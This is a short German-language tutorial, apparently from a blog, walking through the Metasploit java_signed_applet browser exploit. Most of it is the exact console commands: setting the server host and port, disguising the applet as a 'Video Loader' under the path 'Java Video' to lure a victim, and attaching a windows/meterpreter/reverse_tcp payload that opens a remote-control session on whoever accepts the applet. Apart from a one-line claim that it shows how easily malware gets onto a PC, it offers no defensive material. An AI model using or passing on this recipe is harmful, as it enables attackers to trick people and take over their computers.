Metasploit – Java Signed Applet

Ein kleines Tutorail über eine Java Schwachstelle die selbst noch in der neusten Version offen ist. Sie werden in diesem Tutorial selber erleben wie einfach es ist sich Schadware auf den PC zu holen.

Starten Sie die Metasploit Console. Geben Sie dann ein:

use exploit/multi/browser/java_signed_applet

Geben Sie dann den weiteren Befehl ein, um die Einstellungen anzuzeigen:

show options

Stellen Sie dan alle Einstellungen ein. Natürlich benötigen Sie dazu die Grundkentnisse über IP und Ports, und Englisch.

set srvhost 192.168.1.100

set srvport 81

set uripath Java Video

set appletname Video Loader

Jetzt brauchen wir noch einen passenden Payload. Sie  müssen natürlich nicht den gleichen verwenden wie wir in diesem Tutorial.

use payload/windows/meterpreter/reverse_tcp

Lassen Sie sich jetzt wieder die Optionen anziegen, den durch den Payload sind neue Optionen dazu gekommen (Show Options).

set lhost 192.168.1.100

set lport 82

Führen Sie nun den Exploit mit dem Befehl „Exploit“ aus. Warten Sie bis der Server bereit ist. Besuchen Sie dann die Adresse <Lokale/WAN-IP/<uripath>:<port>. Wenn Sie das Java Applet annehmen wird zu ihnen eine Meterpreter Verbindung aufgebaut. Mit dieser Meterpreter Verbindung können Sie den PC „Fernsteuern“.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.